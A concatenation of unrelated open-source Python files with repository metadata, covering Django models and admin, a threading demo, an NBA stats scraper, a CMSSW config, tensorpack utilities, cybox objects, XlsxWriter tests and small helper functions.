message = models.ForeignKey(
"chat.Message",
on_delete=models.CASCADE,
related_name="forwardedmessage_message",
)
forwarded_by = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="forwardedmessage_forwarded_by",
)
forwarded_to = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="forwardedmessage_forwarded_to",
)
timestamp_forwarded = models.DateTimeField(
auto_now_add=True,
)
class MessageAction(models.Model):
"Generated Model"
action = models.CharField(
max_length=7,
)
message = models.ForeignKey(
"chat.Message",
on_delete=models.CASCADE,
related_name="messageaction_message",
)
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="messageaction_profile",
)
timestamp_action = models.DateTimeField(
auto_now_add=True,
)
class Message(models.Model):
"Generated Model"
message = models.TextField()
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="message_thread",
)
sent_by = models.ForeignKey(
"chat.ThreadMember",
on_delete=models.CASCADE,
related_name="message_sent_by",
)
attachment = models.URLField()
is_draft = models.BooleanField()
is_delivered = models.BooleanField()
is_read = models.BooleanField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
timestamp_delivered = models.DateTimeField()
timestamp_read = models.DateTimeField()
class Thread(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
thread_photo = models.URLField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
class ThreadMember(models.Model):
"Generated Model"
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="threadmember_profile",
)
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="threadmember_thread",
)
is_admin = models.BooleanField()
timestamp_joined = models.DateTimeField(
auto_now_add=True,
)
timestamp_left = models.DateTimeField()
last_rejoined = models.DateTimeField()
# Create your models here.
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
c72650b3a9bf00b1efe3f5361b5d09a436c259cc
|
48390374bb000e593a192ba5981210b130ebff1e
|
/using_threads/t3_locks.py
|
3587dac6018618c0cf77b26f789f228f06185810
|
[] |
no_license
|
onionmccabbage/beyondAdvancedPythonApril2021
|
396615bb3c1989e0e57ae818950135250ce9ea33
|
0abccebcff1d0ff2e05f1f3b0188763fa3929920
|
refs/heads/main
| 2023-06-01T22:47:49.855370
| 2021-06-16T12:12:29
| 2021-06-16T12:12:29
| 360,176,678
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 998
|
py
|
import threading
import time
import random
counter = 1
lock = threading.Lock()
def workerA():
global counter
lock.acquire()
try:
while counter <100:
counter += 1
print( 'Worker A is incrementing counter to {}'.format(counter) )
except Exception as e:
print(e)
finally:
lock.release()
def workerB():
global counter
lock.acquire()
try:
while counter >-100:
counter -= 1
print( 'Worker B is decrementing counter to {}'.format(counter) )
except Exception as e:
print(e)
finally:
lock.release()
def main():
t0 = time.time()
thread1 = threading.Thread( target=workerA )
thread2 = threading.Thread( target=workerB )
thread1.start()
thread2.start()
thread1.join()
thread2.join()
t1 = time.time()
print('Execution took {} seconds'.format(t1-t0))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
onionmccabbage.noreply@github.com
|
2d7f069d13b7e23eb16fe01d25ac2cbd1a0d3e43
|
9714a7e31c922dea5187ef09de7c7095bda515e1
|
/visualization/api/ShotsDash.py
|
5c65ee274340933206fb8e4127309f18d9abfc70
|
[] |
no_license
|
rd11490/Russell
|
5104c846bccc52b2456dadb0e3a85af22169006f
|
b1f2c4c96a04a492bc5d1a0596f9bbc40a696e9d
|
refs/heads/master
| 2022-07-11T03:51:29.155850
| 2019-12-31T05:21:58
| 2019-12-31T05:21:58
| 104,696,236
| 5
| 1
| null | 2022-06-20T23:50:29
| 2017-09-25T02:50:00
|
Scala
|
UTF-8
|
Python
| false
| false
| 1,585
|
py
|
import json
import pandas as pd
import urllib3
players = [1628369, 1627759,202954,202681,1626179,202694,202330,1628464,1627824,203935,1628400,201143,203382]
def build_ulr(player):
return "https://stats.nba.com/stats/playerdashptshots?DateFrom=&DateTo=&GameSegment=&LastNGames=0&LeagueID=00&Location=&Month=0&OpponentTeamID=0&Outcome=&PerMode=Totals&Period=0&PlayerID={0}&Season=2018-19&SeasonSegment=&SeasonType=Regular+Season&TeamID=0&VsConference=&VsDivision=".format(player)
header_data = {
'Host': 'stats.nba.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36',
'Referer': 'stats.nba.com',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
http = urllib3.PoolManager()
def extract_data(url, player):
print(url)
r = http.request('GET', url, headers=header_data)
resp = json.loads(r.data)
results = resp['resultSets'][4]
headers = results['headers']
headers.append("player")
rows = results['rowSet']
frame = pd.DataFrame(rows)
frame["player"] = player
frame.columns = headers
return frame
frames = []
for player in players:
url = build_ulr(player)
data = extract_data(url, player)
frames.append(data)
out = pd.concat(frames)
out.to_csv("CsDefenderDist.csv")
|
[
"rd11490@gmail.com"
] |
rd11490@gmail.com
|
26c794fa0e7c4d0f5ce7dd1b14ec5667ae7562db
|
e38692437085a48abba0d682ec9921e7c24bf122
|
/source/webapp/admin.py
|
db2c1391a590d746ca795f1daf03d514497964ea
|
[] |
no_license
|
Aitmatow/farids_blog
|
f7a9e57c18957a1a08b66aff349904ad3b948cbc
|
cc92853ea8e2ac362df8bee4740d98280e7aefed
|
refs/heads/master
| 2023-04-27T23:07:51.848466
| 2019-10-22T12:58:23
| 2019-10-22T12:58:23
| 215,323,364
| 0
| 0
| null | 2023-04-21T20:38:49
| 2019-10-15T14:44:35
|
Python
|
UTF-8
|
Python
| false
| false
| 678
|
py
|
from django.contrib import admin
from webapp.models import Article, Comment, Category, Tag
class CommentAdmin(admin.TabularInline):
model = Comment
fields = ['author', 'text']
extra = 0
class ArticleAdmin(admin.ModelAdmin):
list_display = ['pk', 'title', 'author', 'created_at']
list_filter = ['author', 'category']
list_display_links = ['pk', 'title']
search_fields = ['title', 'text']
exclude = []
filter_horizontal = ['tags']
readonly_fields = ['created_at', 'updated_at']
inlines = [CommentAdmin]
admin.site.register(Article, ArticleAdmin)
admin.site.register(Comment)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"aitmarowd@gmail.com"
] |
aitmarowd@gmail.com
|
d2ff3964c849c9dfa4f125ea4f263ed8cc60c79e
|
68e76ef27df38b0fe2c1c993a9c15896563f950d
|
/2 Практика Робот/robot-tasks-master/task_32.py
|
a6c5bd5d73d6bf5f60c3579c8d427f1c5c882714
|
[] |
no_license
|
Jumas-Cola/mipt_cs_on_python3_answers
|
72e9341656daa4afa35f8d39de917eb5471ee132
|
a2d128c4ce391bdeea6d20eb955855ad5bc5a0b4
|
refs/heads/master
| 2020-03-27T23:44:09.088994
| 2019-07-29T13:55:35
| 2019-07-29T13:55:35
| 147,341,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
#!/usr/bin/python3
from pyrob.api import *
@task(delay=0.01)
def task_8_18():
x=0
while not (wall_is_on_the_right() and not wall_is_on_the_left()):
if not wall_is_above() and wall_is_beneath():
while not wall_is_above():
move_up()
if cell_is_filled():
x+=1
else:
fill_cell()
while not wall_is_beneath():
move_down()
else:
fill_cell()
move_right()
mov('ax',x)
if __name__ == '__main__':
run_tasks()
|
[
"kbbyfl91@gmail.com"
] |
kbbyfl91@gmail.com
|
f57b234180126f5f12df6e7674e04017a4c1f047
|
7524bec2d88ca21750b09b83cc236cbfb6c61fea
|
/setup.py
|
be304e26ac19dc66f8ab4361a1a3074c10526e6b
|
[] |
no_license
|
ericbusboom/insteon
|
c3d25f65038624b0bd3a26cf526f7b3c22891916
|
f090231e197d517c24ee3b00a6143c2b1f0b89fc
|
refs/heads/master
| 2020-04-19T08:23:51.283619
| 2015-02-14T19:55:10
| 2015-02-14T19:55:10
| 9,122,856
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
from setuptools import setup, find_packages
setup(name='esbinsteon',
version='1.0',
description='Program to control an insteon interface. ',
author='Eric Busboom',
author_email='eric@busboom.org',
url='http://busboom.org',
packages=['esbinsteon'],
package_data={'esbinsteon': ['config/*']},
scripts=['scripts/insteon_schedule','scripts/insteon_switch', 'scripts/insteon_install'],
install_requires=[
'pyephem',
'PyYAML',
'python-dateutil'
],
)
|
[
"eric@clarinova.com"
] |
eric@clarinova.com
|
7122016d14d9ea48aa260c13465ca27e234421c0
|
b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1
|
/tensorflow/python/training/training_util_test.py
|
3ec83b7be7f95c031003a009aa40c63af02060b2
|
[
"Apache-2.0"
] |
permissive
|
uve/tensorflow
|
e48cb29f39ed24ee27e81afd1687960682e1fbef
|
e08079463bf43e5963acc41da1f57e95603f8080
|
refs/heads/master
| 2020-11-29T11:30:40.391232
| 2020-01-11T13:43:10
| 2020-01-11T13:43:10
| 230,088,347
| 0
| 0
|
Apache-2.0
| 2019-12-25T10:49:15
| 2019-12-25T10:49:14
| null |
UTF-8
|
Python
| false
| false
| 5,363
|
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
from tensorflow.python.training import training_util
@test_util.run_v1_only('b/120545219')
class GlobalStepTest(test.TestCase):
def _assert_global_step(self, global_step, expected_dtype=dtypes.int64):
self.assertEqual('%s:0' % ops.GraphKeys.GLOBAL_STEP, global_step.name)
self.assertEqual(expected_dtype, global_step.dtype.base_dtype)
self.assertEqual([], global_step.get_shape().as_list())
def test_invalid_dtype(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.Variable(
0.0,
trainable=False,
dtype=dtypes.float32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step, g)
def test_invalid_shape(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
[0],
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step, g)
def test_create_global_step(self):
self.assertIsNone(training_util.get_global_step())
with ops.Graph().as_default() as g:
global_step = training_util.create_global_step()
self._assert_global_step(global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step, g)
self._assert_global_step(training_util.create_global_step(ops.Graph()))
def test_get_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
0,
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self._assert_global_step(
training_util.get_global_step(), expected_dtype=dtypes.int32)
self._assert_global_step(
training_util.get_global_step(g), expected_dtype=dtypes.int32)
def test_get_or_create_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
self._assert_global_step(training_util.get_or_create_global_step())
self._assert_global_step(training_util.get_or_create_global_step(g))
@test_util.run_v1_only('b/120545219')
class GlobalStepReadTest(test.TestCase):
def test_global_step_read_is_none_if_there_is_no_global_step(self):
with ops.Graph().as_default():
self.assertIsNone(training_util._get_or_create_global_step_read())
training_util.create_global_step()
self.assertIsNotNone(training_util._get_or_create_global_step_read())
def test_reads_from_cache(self):
with ops.Graph().as_default():
training_util.create_global_step()
first = training_util._get_or_create_global_step_read()
second = training_util._get_or_create_global_step_read()
self.assertEqual(first, second)
def test_reads_before_increments(self):
with ops.Graph().as_default():
training_util.create_global_step()
read_tensor = training_util._get_or_create_global_step_read()
inc_op = training_util._increment_global_step(1)
inc_three_op = training_util._increment_global_step(3)
with monitored_session.MonitoredTrainingSession() as sess:
read_value, _ = sess.run([read_tensor, inc_op])
self.assertEqual(0, read_value)
read_value, _ = sess.run([read_tensor, inc_three_op])
self.assertEqual(1, read_value)
read_value = sess.run(read_tensor)
self.assertEqual(4, read_value)
if __name__ == '__main__':
test.main()
|
[
"v-grniki@microsoft.com"
] |
v-grniki@microsoft.com
|
3870e76c40ced6a801aa513970ff4feb772a2eac
|
c957b4663cc4cb21e5172f23c6989031be8c3e5b
|
/python/141. Linked List Cycle.py
|
2b938337525872e17fcb52a8afbee163e4aa0323
|
[] |
no_license
|
gajanlee/leetcode
|
e061dc37af0f83bf2bce00c391c0b8a9f3177b22
|
0d3c8477f05604a059e58a8764ce0d8bd418edde
|
refs/heads/master
| 2018-12-26T06:12:24.995542
| 2018-10-30T05:03:27
| 2018-10-30T05:03:27
| 102,965,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
"""
Given a linked list, determine if it has a cycle in it.
Follow up:
Can you solve it without using extra space?
"""
# 如果存在环,那么一个指针移动一个,另外一个移动两个,两个指针会相遇的
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if head is None: return False
l1, l2 = head, head.next
while l1 and l2 and l2.next:
if l1 == l2: return True
l1 = l1.next
l2 = l2.next.next
return False
|
[
"lee_jiazh@163.com"
] |
lee_jiazh@163.com
|
8fe28884609f1cd95401053f75ed6003569df8ab
|
2f14f8bccf15ccea2ff50e2f92164b43cb8f78b1
|
/Dynamic Programming/LeetCode/MinimumCostForTickets_983.py
|
a2fbbbecdcf36d899c75b0abeb0b3e3cc2e3c0ba
|
[] |
no_license
|
nikhiilll/Algorithms-using-Python
|
b3372f3ecca8e0c8e1358bb5a87391038a6630b6
|
8439864c637578d15915113564dbbf047b75b107
|
refs/heads/master
| 2023-02-10T23:09:31.312693
| 2020-12-24T16:56:29
| 2020-12-24T16:56:29
| 313,243,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 445
|
py
|
def minimumCostForTickets(days, costs):
costArray = [0 for i in range(days[-1] + 1)]
for i in range(1, days[-1] + 1):
if i not in days:
costArray[i] = costArray[i - 1]
else:
costArray[i] = min(costArray[max(0, i - 1)] + costs[0], costArray[max(0, i - 7)] + costs[1], costArray[max(0, i - 30)] + costs[2])
return costArray[-1]
print(minimumCostForTickets([1,4,6,7,8,20], [2,7,15]))
|
[
"pawarnikhilp@gmail.com"
] |
pawarnikhilp@gmail.com
|
0a8e33e5da3e1e73a09e33523e5636f64d2b3abd
|
9697a1ab85af91ee587623ac3089adb5dbbd6814
|
/configs/QCD_AOD__9_cfg.py
|
f0f4e8a89e9f22c748119952227009ee9236238a
|
[] |
no_license
|
nicholas-bower/myLowPtGsfElectronAnalyzer
|
e9bfaad71631fda4fa67e532015daef2f03edab5
|
d4558c124af04f09db9e51e468f8ac3268a940e5
|
refs/heads/master
| 2022-11-16T21:02:56.940840
| 2020-07-16T15:37:03
| 2020-07-16T15:37:03
| 280,191,555
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,818
|
py
|
# Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: test2 -s RAW2DIGI,L1Reco,RECO --datatier RECO --era=Run2_2018 --conditions auto:phase1_2018_realistic --eventcontent RECO --filein file:test.root --no_exec
import FWCore.ParameterSet.Config as cms
#f = open("/uscms_data/d3/nbower/FSU/TestLowPt/CMSSW_10_6_12/src/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/macros/fileLists/m50_ALP_fileList.txt","r")
f = open('./myLowPtGsfElectronsAnalyzer/macros/fileLists/QCD_AOD/QCD_AOD__9.txt','r')
infiles = f.readlines()
f.close()
from FWCore.ParameterSet.VarParsing import VarParsing
options = VarParsing ('python')
options.setDefault('maxEvents',-1)
options.setDefault('inputFiles',infiles)
options.parseArguments()
process = cms.Process('TEST') # ,eras.bParkingOpen
# import of standard configurations
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(options.maxEvents)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(options.inputFiles),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Output definition
# Path and EndPath definitions
process.load('myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer_cfi')
# Schedule definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('root://cmseos.fnal.gov//store/user/nbower/plots/QCD_LowPT/QCD_AOD__9.root')
)
process.p = cms.Path(process.simple)
# Customisation from command line
# End adding early deletion
#open('pydump.py','w').write(process.dumpPython())
|
[
"nbower@andrew.cmu.edu"
] |
nbower@andrew.cmu.edu
|
2da59e2885e26454205131e62eb8ef38c89aa7d9
|
0b05df6c954e5952369d544a878111798c83be59
|
/tensorpack/utils/argtools.py
|
743bbaeb089d21c8a3f3e77d64f1937b75fdeb8d
|
[
"Apache-2.0"
] |
permissive
|
SunskyF/tensorpack
|
ddd1182acc8cfe6354d08679ef6bae11022b4230
|
ffe1398a146312cc74189e529475e67ca0b0cd5c
|
refs/heads/master
| 2020-04-12T09:24:47.182655
| 2018-12-19T07:52:06
| 2018-12-19T07:52:06
| 162,401,727
| 0
| 0
|
Apache-2.0
| 2018-12-19T07:49:38
| 2018-12-19T07:49:37
| null |
UTF-8
|
Python
| false
| false
| 6,132
|
py
|
# -*- coding: utf-8 -*-
# File: argtools.py
import inspect
import six
from . import logger
if six.PY2:
import functools32 as functools
else:
import functools
__all__ = ['map_arg', 'memoized', 'memoized_method', 'graph_memoized', 'shape2d', 'shape4d',
'memoized_ignoreargs', 'log_once', 'call_only_once']
def map_arg(**maps):
"""
Apply a mapping on certain argument before calling the original function.
Args:
maps (dict): {argument_name: map_func}
"""
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if six.PY2:
argmap = inspect.getcallargs(func, *args, **kwargs)
else:
# getcallargs was deprecated since 3.5
sig = inspect.signature(func)
argmap = sig.bind_partial(*args, **kwargs).arguments
for k, map_func in six.iteritems(maps):
if k in argmap:
argmap[k] = map_func(argmap[k])
return func(**argmap)
return wrapper
return deco
memoized = functools.lru_cache(maxsize=None)
""" Alias to :func:`functools.lru_cache`
WARNING: memoization will keep keys and values alive!
"""
def graph_memoized(func):
"""
Like memoized, but keep one cache per default graph.
"""
# TODO it keeps the graph alive
import tensorflow as tf
GRAPH_ARG_NAME = '__IMPOSSIBLE_NAME_FOR_YOU__'
@memoized
def func_with_graph_arg(*args, **kwargs):
kwargs.pop(GRAPH_ARG_NAME)
return func(*args, **kwargs)
@functools.wraps(func)
def wrapper(*args, **kwargs):
assert GRAPH_ARG_NAME not in kwargs, "No Way!!"
graph = tf.get_default_graph()
kwargs[GRAPH_ARG_NAME] = graph
return func_with_graph_arg(*args, **kwargs)
return wrapper
_MEMOIZED_NOARGS = {}
def memoized_ignoreargs(func):
"""
A decorator. It performs memoization ignoring the arguments used to call
the function.
"""
def wrapper(*args, **kwargs):
if func not in _MEMOIZED_NOARGS:
res = func(*args, **kwargs)
_MEMOIZED_NOARGS[func] = res
return res
return _MEMOIZED_NOARGS[func]
return wrapper
def shape2d(a):
"""
Ensure a 2D shape.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 2. if ``a`` is a int, return ``[a, a]``.
"""
if type(a) == int:
return [a, a]
if isinstance(a, (list, tuple)):
assert len(a) == 2
return list(a)
raise RuntimeError("Illegal shape: {}".format(a))
def get_data_format(data_format, tfmode=True):
if tfmode:
dic = {'NCHW': 'channels_first', 'NHWC': 'channels_last'}
else:
dic = {'channels_first': 'NCHW', 'channels_last': 'NHWC'}
ret = dic.get(data_format, data_format)
if ret not in dic.values():
raise ValueError("Unknown data_format: {}".format(data_format))
return ret
def shape4d(a, data_format='channels_last'):
"""
Ensuer a 4D shape, to use with 4D symbolic functions.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 4. if ``a`` is a int, return ``[1, a, a, 1]``
or ``[1, 1, a, a]`` depending on data_format.
"""
s2d = shape2d(a)
if get_data_format(data_format) == 'channels_last':
return [1] + s2d + [1]
else:
return [1, 1] + s2d
@memoized
def log_once(message, func='info'):
"""
Log certain message only once. Call this function more than one times with
the same message will result in no-op.
Args:
message(str): message to log
func(str): the name of the logger method. e.g. "info", "warn", "error".
"""
getattr(logger, func)(message)
def call_only_once(func):
"""
Decorate a method or property of a class, so that this method can only
be called once for every instance.
Calling it more than once will result in exception.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
# cannot use hasattr here, because hasattr tries to getattr, which
# fails if func is a property
assert func.__name__ in dir(self), "call_only_once can only be used on method or property!"
if not hasattr(self, '_CALL_ONLY_ONCE_CACHE'):
cache = self._CALL_ONLY_ONCE_CACHE = set()
else:
cache = self._CALL_ONLY_ONCE_CACHE
cls = type(self)
# cannot use ismethod(), because decorated method becomes a function
is_method = inspect.isfunction(getattr(cls, func.__name__))
assert func not in cache, \
"{} {}.{} can only be called once per object!".format(
'Method' if is_method else 'Property',
cls.__name__, func.__name__)
cache.add(func)
return func(*args, **kwargs)
return wrapper
def memoized_method(func):
"""
A decorator that performs memoization on methods. It stores the cache on the object instance itself.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
assert func.__name__ in dir(self), "memoized_method can only be used on method!"
if not hasattr(self, '_MEMOIZED_CACHE'):
cache = self._MEMOIZED_CACHE = {}
else:
cache = self._MEMOIZED_CACHE
key = (func, ) + args[1:] + tuple(kwargs)
ret = cache.get(key, None)
if ret is not None:
return ret
value = func(*args, **kwargs)
cache[key] = value
return value
return wrapper
if __name__ == '__main__':
class A():
def __init__(self):
self._p = 0
@call_only_once
def f(self, x):
print(x)
@property
def p(self):
return self._p
@p.setter
@call_only_once
def p(self, val):
self._p = val
a = A()
a.f(1)
b = A()
b.f(2)
b.f(1)
print(b.p)
print(b.p)
b.p = 2
print(b.p)
b.p = 3
print(b.p)
|
[
"ppwwyyxxc@gmail.com"
] |
ppwwyyxxc@gmail.com
|
5b13733fd9888fea4a5dbbefc18f3413b70f4bec
|
75e84467a370b22aae4f30ab1fa7b42ccec9cb85
|
/cybox/objects/user_account_object.py
|
b25c7ea95eded4bb86a815050cbf12cda9073d4f
|
[
"BSD-3-Clause"
] |
permissive
|
cy-fir/python-cybox
|
cbe6eaafeac2a0dcb2ba06925ea72c3c44e29f42
|
292a378be5322032e8df0b9a110c2205b72aeee6
|
refs/heads/master
| 2020-12-31T03:36:26.544132
| 2016-01-22T22:05:25
| 2016-01-22T22:05:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,075
|
py
|
# Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities
from mixbox import fields
import cybox.bindings.user_account_object as user_account_binding
from cybox.common import DateTime, Duration, String
from cybox.objects.account_object import Account
class Group(entities.Entity):
"""An abstract class for account groups."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class GroupList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.GroupListType
_binding_var = 'Group'
_contained_type = Group
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class Privilege(entities.Entity):
"""An abstract class for account privileges."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class PrivilegeList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.PrivilegeListType
_binding_var = 'Privilege'
_contained_type = Privilege
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class UserAccount(Account):
_binding = user_account_binding
_binding_class = user_account_binding.UserAccountObjectType
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
_XSI_NS = "UserAccountObj"
_XSI_TYPE = "UserAccountObjectType"
password_required = fields.TypedField('password_required')
full_name = fields.TypedField('Full_Name', String)
home_directory = fields.TypedField('Home_Directory', String)
last_login = fields.TypedField('Last_Login', DateTime)
script_path = fields.TypedField('Script_Path', String)
username = fields.TypedField('Username', String)
user_password_age = fields.TypedField('User_Password_Age', Duration)
# These should be overriden by subclasses
group_list = fields.TypedField('Group_List', GroupList)
privilege_list = fields.TypedField('Privilege_List', PrivilegeList)
|
[
"gback@mitre.org"
] |
gback@mitre.org
|
925fde5c4d36383db5a4ca3dd2f2a95b0eac5cd1
|
45de7d905486934629730945619f49281ad19359
|
/xlsxwriter/test/worksheet/test_write_sheet_view.py
|
80b851daa21e858de10d231daeeebed0d8042104
|
[
"BSD-2-Clause"
] |
permissive
|
jmcnamara/XlsxWriter
|
599e1d225d698120ef931a776a9d93a6f60186ed
|
ab13807a1be68652ffc512ae6f5791d113b94ee1
|
refs/heads/main
| 2023-09-04T04:21:04.559742
| 2023-08-31T19:30:52
| 2023-08-31T19:30:52
| 7,433,211
| 3,251
| 712
|
BSD-2-Clause
| 2023-08-28T18:52:14
| 2013-01-04T01:07:06
|
Python
|
UTF-8
|
Python
| false
| false
| 3,163
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ...worksheet import Worksheet
class TestWriteSheetView(unittest.TestCase):
"""
Test the Worksheet _write_sheet_view() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_sheet_view_tab_not_selected(self):
"""Test the _write_sheet_view() method. Tab not selected"""
self.worksheet._write_sheet_view()
exp = """<sheetView workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_tab_selected(self):
"""Test the _write_sheet_view() method. Tab selected"""
self.worksheet.select()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines()"""
self.worksheet.select()
self.worksheet.hide_gridlines()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_0(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(0)"""
self.worksheet.select()
self.worksheet.hide_gridlines(0)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_1(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(1)"""
self.worksheet.select()
self.worksheet.hide_gridlines(1)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_2(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(2)"""
self.worksheet.select()
self.worksheet.hide_gridlines(2)
self.worksheet._write_sheet_view()
exp = """<sheetView showGridLines="0" tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_row_col_headers(self):
"""Test the _write_sheet_views() method"""
self.worksheet.select()
self.worksheet.hide_row_col_headers()
self.worksheet._write_sheet_view()
exp = (
"""<sheetView showRowColHeaders="0" tabSelected="1" workbookViewId="0"/>"""
)
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
a753eac93c08765a0bdfa2dc047e3540b4c795b6
|
d7a73fdc2fa60a171d1b3ed3bbefe863c9351fab
|
/progen_transformer/utils.py
|
985f3b5fa667b37073c055c4d1b1786ddb90b702
|
[
"MIT"
] |
permissive
|
sailfish009/progen
|
e584d7352d8f89c7d72992c222ca888db7f28495
|
131320c67ed831aa812e58a4995d3414e458640f
|
refs/heads/main
| 2023-06-07T12:49:09.742045
| 2021-07-04T00:06:59
| 2021-07-04T00:06:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,477
|
py
|
import os, errno
from shutil import rmtree
from jax import random, nn, value_and_grad, vmap, pmap, jit, lax
from jax.lax import top_k
import jax.numpy as np
# helper functions
def exists(val):
return val is not None
def log(t, eps = 1e-20):
return np.log(t + eps)
def confirm(question):
while True:
resp = input(f'{question} (y/n) ')
lower_resp = resp.lower()
if lower_resp in ('y', 'n'):
return lower_resp == 'y'
def clear_directory_(path):
rmtree(str(path), ignore_errors = True)
path.mkdir(exist_ok = True, parents = True)
def silentremove(filename):
try:
os.remove(filename)
except OSError:
pass
